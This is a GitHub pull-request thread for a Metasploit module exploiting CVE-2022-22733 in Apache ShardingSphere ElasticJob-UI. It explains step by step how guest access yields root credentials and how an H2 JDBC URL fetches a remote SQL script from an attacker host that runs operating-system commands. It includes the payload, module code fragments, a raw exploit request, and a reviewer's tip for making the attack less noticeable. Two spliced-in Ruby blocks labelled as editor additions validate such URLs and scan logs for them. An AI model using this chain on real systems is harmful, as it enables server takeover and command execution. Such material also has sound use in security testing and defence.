
Add module for CVE-2022-22733: Apache ShardingSphere ElasticJob-UI privilege escalation #17978

Closed
wants to merge 10 commits into from

Conversation

Zeyad-Azima

@Zeyad-Azima Zeyad-Azima commented May 10, 2023

Vulnerable Application

A vulnerability discovered in Apache ShardingSphere ElasticJob-UI, known as CVE-2022-22733, leads to the exposure of sensitive information and as a result allows an attacker who has a guest account to perform privilege escalation.

You can setup the app using docker: sudo docker pull apache/shardingsphere-elasticjob-lite-ui:3.0.0

Verification Steps

Example steps in this format (they are also in the PR):

  1. Install the application: sudo docker pull apache/shardingsphere-elasticjob-lite-ui:3.0.0
  2. Start msfconsole
  3. Do: use exploit/multi/http/apache_shardingsphere_cve_2022_22733
  4. Do: set RHOSTS target
  5. Do: set JDBC URL_to_your_malicious_sql_script
  6. Do: exploit
  7. You should get root account credentials.

Options

  • JDBC: Payload URL for JDBC Attack ex: http://ip:8000/poc.sql.
  • PASSWORD: Password for authentication.
  • Proxies: A proxy chain of format type:host:port[,type:host:port][...]
  • RHOSTS: The target host(s)
  • RPORT: The target port (TCP)
  • SSL: Negotiate SSL/TLS for outgoing connections
  • USERNAME: The username to authenticate with
  • VHOST: HTTP server virtual host

Option Name

  • JDBC: Payload URL for the JDBC attack, e.g. http://ip:8000/poc.sql. This is used to add the URL of your malicious SQL script to the request that performs the JDBC attack. It is required.
  • PASSWORD: The password for the low-privileged account that you have; the default value is guest, which comes with the application. The user can change it if they already have an account. It is required.
  • Proxies: A proxy chain of format type:host:port[,type:host:port][...]
  • RHOSTS: The target domain/IP. It is required.
  • RPORT: The target port of the application; the default port that the application always uses is 8088. It is required.
  • SSL: Negotiate SSL/TLS for outgoing connections, in case the target uses SSL. It is not required by default.
  • USERNAME: The username for the low-privileged account that you have; the default value is guest, which comes with the application. The user can change it if they already have an account. It is required.
  • VHOST: HTTP server virtual host. It is not required.

Scenarios

In case you don't know what the JDBC option is, you can check it from here.

Basically, if you have a privileged account like the root account, you will be able to create a database connection.
Now, you may be wondering: if we have the root account credentials, why would we need to retrieve its token? Basically, to perform a connection through JDBC we need high privileges, and to automate this process let's first see how it works.

image

As you can see, when we logged in as guest we are not able to add any data source. But if we log in with the root account, we can see that we have the privileges to add a data source and test the connection:

image

Now, under the Event Tracer Data Source, click on the Add button and add the following:

image

What did we do here? We named our data source, then used the H2 driver. H2 itself is a relational database management system, and org.h2.Driver is the JDBC driver used to connect to an H2 database from Java. The URL value:

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'

Basically, this is a JDBC connection string which will connect to an H2 in-memory database with the name we give, which is testdb. Then, the TRACE_LEVEL_SYSTEM_OUT=3 parameter enables trace logging to be printed to the console. Finally, the INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql' parameter specifies that the poc.sql script located at our URL should be executed when the database is initialized. But what is inside the poc.sql file?

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')

In short, this SQL script uses the H2 database's ability to create an alias that executes a command, and here we execute calc.exe as a demo of the exploit. Now let's start our HTTP server that will host our poc.sql script, and after that click on the Test Connect button:

Now that we understand it clearly, we can run our Metasploit module to perform all of these steps.

[*] Attempting to authenticate...
[+] Authenticated Successfully
[*] Root username: root
[*] Root password: root
[*] Attempting to authenticate with root credentials...
[+] Authenticated with root credentials successfully
[*] Attempting JDBC attack...
[+] JDBC attack successful

For example:

To use it with the default config:

msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > set RHOSTS 192.168.0.162
RHOSTS => 192.168.0.162
msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > set JDBC http://192.168.0.162:8000/poc.sql
JDBC => http://192.168.0.162:8000/poc.sql
msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > exploit

Reference

You can read the vulnerability analysis here, and the step-by-step exploit blog here.
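The description above explains the H2 connection string piece by piece: settings follow the database locator separated by `;`, and `INIT=RUNSCRIPT FROM '<url>'` makes the driver fetch and execute a remote script on connection. As an added example (editor's code, not part of the PR or the Metasploit module), here is the check a data-source endpoint could apply to a user-supplied JDBC URL before passing it to the H2 driver. The function names and the finding symbols are this example's own; the sample URL is the one quoted in the description.

```ruby
# Added example, not code from the PR or the Metasploit module: a validator that a
# data-source endpoint could apply to a user-supplied JDBC URL before handing it to
# the H2 driver. H2 reads connection settings from the ';'-separated tail of the URL;
# the INIT setting runs SQL on every new connection, and "INIT=RUNSCRIPT FROM '<url>'"
# is what makes the driver fetch and execute a remote script.
H2_PREFIX = 'jdbc:h2:'.freeze

# Split "jdbc:h2:<database>;KEY=VALUE;..." into the database locator and a hash of
# settings keyed by upper-cased name (H2 treats setting names case-insensitively).
def parse_h2_url(url)
  raise ArgumentError, "not an H2 JDBC URL: #{url}" unless url.downcase.start_with?(H2_PREFIX)

  database, *raw_settings = url[H2_PREFIX.length..].split(';')
  settings = raw_settings.each_with_object({}) do |part, acc|
    key, value = part.split('=', 2)
    acc[key.to_s.strip.upcase] = value.to_s.strip
  end
  [database, settings]
end

# The script source named by INIT=RUNSCRIPT FROM '<source>', or nil when absent.
def runscript_source(url)
  _database, settings = parse_h2_url(url)
  init = settings['INIT']
  return nil if init.nil?

  match = init.match(/RUNSCRIPT\s+FROM\s+'([^']+)'/i)
  match && match[1]
end

# Findings are symbols so a caller can log, block or alert on each one.
def audit_h2_url(url)
  _database, settings = parse_h2_url(url)
  findings = []
  if settings.key?('INIT')
    findings << :init_statements            # arbitrary SQL runs on every connection
    source = runscript_source(url)
    unless source.nil?
      findings << :runscript_from_file      # an external SQL file is read and executed
      findings << :runscript_remote if source.match?(%r{\A(?:https?|ftp)://}i)
    end
  end
  findings
end

# Policy: only a URL with no findings may be saved as a data source. H2 also accepts
# settings through the java.util.Properties passed to getConnection, so a real
# deployment must apply the same check to that map, not only to the URL string.
def h2_url_allowed?(url)
  audit_h2_url(url).empty?
end

if __FILE__ == $PROGRAM_NAME
  # The connection string from the PR description above.
  sample = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'"
  puts "findings:      #{audit_h2_url(sample).inspect}"
  puts "script source: #{runscript_source(sample)}"
  puts "allowed?       #{h2_url_allowed?(sample)}"
end
```

Rejecting `INIT` outright is the simplest policy for an application that only needs plain connections; an allow-list of driver classes is a stronger control than URL inspection, since every driver has its own URL grammar and settings.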

@Zeyad-Azima Zeyad-Azima changed the title Create apache_shardingsphere_cve_2022_22733.rb Add module for CVE-2022-22733: Apache ShardingSphere ElasticJob-UI privilege escalation May 10, 2023
@bcoles bcoles added module needs-docs needs-linting The module needs additional work to pass our automated linting rules labels May 10, 2023
@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@github-actions

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@gwillcox-r7
Contributor

Additional documentation on how this module is meant to work will be needed in order to test this. In particular, your step "Start http server has your malicious sql file for JDBC attack." seems to suggest using an external tool outside of Metasploit to complete this attack, which raises some concerns. Can you provide more clarity on what you meant by this step?

@Zeyad-Azima
Author

Additional documentation on how this module is meant to work will be needed in order to test this. In particular, your step "Start http server has your malicious sql file for JDBC attack." seems to suggest using an external tool outside of Metasploit to complete this attack, which raises some concerns. Can you provide more clarity on what you meant by this step?

@Zeyad-Azima
Author

apache_shardingsphere_cve_2022_22733.md

Additional documentation on how this module is meant to work will be needed in order to test this. In particular, your step "Start http server has your malicious sql file for JDBC attack." seems to suggest using an external tool outside of Metasploit to complete this attack, which raises some concerns. Can you provide more clarity on what you meant by this step?

Hello @gwillcox-r7, I have modified the doc in this pull request, you can check it out. It's the documentation for the module. Thanks.

@gwillcox-r7
Contributor

apache_shardingsphere_cve_2022_22733.md

Additional documentation on how this module is meant to work will be needed in order to test this. In particular, your step "Start http server has your malicious sql file for JDBC attack." seems to suggest using an external tool outside of Metasploit to complete this attack, which raises some concerns. Can you provide more clarity on what you meant by this step?

Hello @gwillcox-r7, I have modified the doc in this pull request, you can check it out. It's the documentation for the module. Thanks.

Hi there, this PR has not been updated to include the doc file as part of this pull request. Please update this PR to add a commit including this file and then I can review it further.

[
OptString.new('USERNAME', [ true, 'The username to authenticate with', 'guest']),
OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'guest']),
OptString.new('JDBC', [ true, 'Payload URL for JDBC Attack ex: http://ip:8000/poc.sql' ])
Contributor


In my understanding, the user will have to start his own HTTP server to deliver the payload. Instead, this can be handled by Metasploit directly with its internal HTTP server. The main advantage would be to handle any kind of payload and get a Meterpreter session.

You can have a look at this module as an example of how to set up an HTTP server to deliver the payload:

https://github.com/rapid7/metasploit-framework/blob/3ffd07285216171a9abc3c3588d1da3453e7f464/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb

Please, let us know if you have any questions about this.

'method' => 'POST',
'uri' => '/api/login',
'ctype' => 'application/json',
'data' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
Contributor


Please, use vars_post instead. This would handle everything for you, including encoding:

Suggested change
'data' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}

Contributor


@cdelafuente-r7 Tried your suggestion but this didn't in fact format the request as you expected. Seems like the author's original suggestion may be needed.

@gwillcox-r7
Contributor

Ping @Zeyad-Azima, do you need any help making the adjustments that @cdelafuente-r7 recommended?

@gwillcox-r7 gwillcox-r7 added blocked Blocked by one or more additional tasks attic Older submissions that we still want to work on again and removed blocked Blocked by one or more additional tasks labels Jun 5, 2023
@github-actions github-actions bot closed this Jun 5, 2023
@gwillcox-r7 gwillcox-r7 reopened this Jun 5, 2023
@rapid7 rapid7 deleted a comment from github-actions bot Jun 5, 2023
@gwillcox-r7 gwillcox-r7 removed the attic Older submissions that we still want to work on again label Jun 5, 2023
@gwillcox-r7 gwillcox-r7 self-assigned this Jun 5, 2023
@gwillcox-r7
Contributor

After reading the blog posts a bit more, I realized that as it stands right now, this module will make an arbitrary JDBC connection from the target to a URL we control but it will never actually create a server to serve up that payload. In fact there is no reference to the payload at all.

Reading the article I'm guessing this is what is needed:

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')

Where we replace calc.exe with the command we actually want to execute for our target payload to work. However feel free to correct me if I am wrong here.

'headers' => {
'Access-Token' => root_access_token
},
'data' => { 'name' => 'azima', 'driver' => 'org.h2.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{datastore['JDBC']}'", 'username' => 'a', 'password' => 'a' }.to_json
Contributor


We don't need the extra tracing information, so this should remove the TRACE_LEVEL_SYSTEM_OUT=3 part. It's going to make the attack easier to notice and offers us as attackers no benefit.

@gwillcox-r7 gwillcox-r7 added docs and removed needs-docs needs-linting The module needs additional work to pass our automated linting rules labels Jun 6, 2023
@gwillcox-r7
Contributor

Mostly got this working but running into this odd error when trying to retrieve the SQL file with commands to execute:

POST /api/data-source/connectTest HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.1; rv:108.0) Gecko/20100101 Firefox/108.0
Access-Token: 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
Content-Type: application/json
Content-Length: 203

{"name":"6PVJK5wL","driver":"org.h2.Driver","url":"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.64.128:9090//gB89owqX.sql'","username":"ZZ5O","password":"rFa02gjNbROa"}
[*] 192.168.64.128:9090 - Sending payload to target...
####################
# Response:
####################
HTTP/1.1 200
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type,Access-Token
Set-Cookie: JSESSIONID=E0B7060B6D8319A6252505D0F15AEDF3; Path=/; HttpOnly
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Tue, 06 Jun 2023 19:02:18 GMT

{"success":false,"errorCode":500,"errorMsg":"IO Exception: \"java.io.IOException: Cannot run program \"\"javac\"\": error=2, No such file or directory\"; SQL statement:\nCREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"123\";}' [90028-196]","model":null}
[-] Exploit aborted due to failure: unexpected-reply: JDBC attack failed. The error message was IO Exception: "java.io.IOException: Cannot run program ""javac"": error=2, No such file or directory"; SQL statement:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}' [90028-196]
[*] Server stopped.
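The error response quoted in the comment above echoes the failing SQL statement back, including the Java source of the alias, and the `javac` failure shows that the alias can only be compiled where a JDK is present. As an added example (editor's code, not part of the PR or the module), here is detection logic a defender could run over application log lines to spot these server-side traces. The sample lines are constructed for the example and modelled on the request and response quoted above; they are not real captures, and the signature and severity names are this example's own.

```ruby
# Added example (not part of the PR or the module): scan application log lines for
# the traces this technique leaves on the server side. The sample lines below are
# constructed for the example, modelled on the request and error response quoted
# in the comment above; they are not real captures.
SAMPLE_LOG_LINES = [
  '2023-06-06T19:02:18Z INFO  connectTest name=6PVJK5wL driver=org.h2.Driver ' \
    'url="jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM \'http://192.168.64.128:9090//gB89owqX.sql\'"',
  '2023-06-06T19:02:18Z ERROR IO Exception: "java.io.IOException: Cannot run program ""javac"": ' \
    'error=2, No such file or directory"; SQL statement: CREATE ALIAS EXEC AS ' \
    '\'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}\' [90028-196]',
  '2023-06-06T19:05:00Z INFO  connectTest name=reporting driver=org.h2.Driver ' \
    'url="jdbc:h2:tcp://db.internal:9092/jobs"'
].freeze

# One regex per piece of evidence; a single line may match several.
SIGNATURES = {
  remote_runscript: /RUNSCRIPT\s+FROM\s+'(?:https?|ftp):\/\//i, # SQL fetched from a URL
  java_alias:       /CREATE\s+ALIAS\s+\w+\s+AS\s+'/i,          # function defined from Java source
  runtime_exec:     /Runtime\.getRuntime\(\)\.exec/,            # OS command execution in that source
  javac_missing:    /Cannot run program "+javac"+/              # compile attempt failed (no JDK on host)
}.freeze

SEVERITY_ORDER = %i[info high critical].freeze

# Names of the signatures that match one line, in SIGNATURES order.
def scan_line(line)
  SIGNATURES.select { |_, pattern| line.match?(pattern) }.keys
end

# [[line_index, [signature, ...]], ...] for every line with at least one hit.
def scan_log(lines)
  lines.each_with_index.filter_map do |line, idx|
    hits = scan_line(line)
    [idx, hits] unless hits.empty?
  end
end

# Evidence of a Java alias or Runtime.exec is critical; a remote RUNSCRIPT on its own
# is high because the fetched file's contents are unknown; anything else is info.
def severity(hits)
  return :critical if hits.include?(:java_alias) || hits.include?(:runtime_exec)
  return :high if hits.include?(:remote_runscript)

  :info
end

# The worst severity seen across a batch of lines (:info when nothing matched).
def highest_severity(lines)
  scan_log(lines).map { |_, hits| severity(hits) }.max_by { |s| SEVERITY_ORDER.index(s) } || :info
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG_LINES).each { |idx, hits| puts "line #{idx}: #{severity(hits)} #{hits.inspect}" }
  puts "overall: #{highest_severity(SAMPLE_LOG_LINES)}"
end
```

The first sample line is caught by the request alone, before any SQL runs, which is the earlier of the two signals; the error line is only written when the script was actually fetched and executed, so it confirms that the connection test reached the remote file.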

@gwillcox-r7 gwillcox-r7 added the blocked Blocked by one or more additional tasks label Jun 7, 2023
@gwillcox-r7
Contributor

Marking this as delayed. I can't seem to solve the issue above and trying to install this product on non-Docker devices keeps throwing up errors with Java at the moment.

@gwillcox-r7 gwillcox-r7 removed their assignment Jun 7, 2023
@gwillcox-r7
Contributor

@Zeyad-Azima Any update on the above? If not I'm going to have to attic this PR until we can get a solution.

@bwatters-r7
Contributor

I'm going to go ahead and attic this.

@bwatters-r7 bwatters-r7 added the attic Older submissions that we still want to work on again label Oct 3, 2023
@github-actions

github-actions bot commented Oct 3, 2023

Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it attic and closed it for now.

What does this generally mean? It could be one or more of several things:

  • It doesn't look like there has been any activity on this pull request in a while
  • We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
  • Sometimes the implementation isn't quite right and a different approach is necessary.

We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!

@github-actions github-actions bot closed this Oct 3, 2023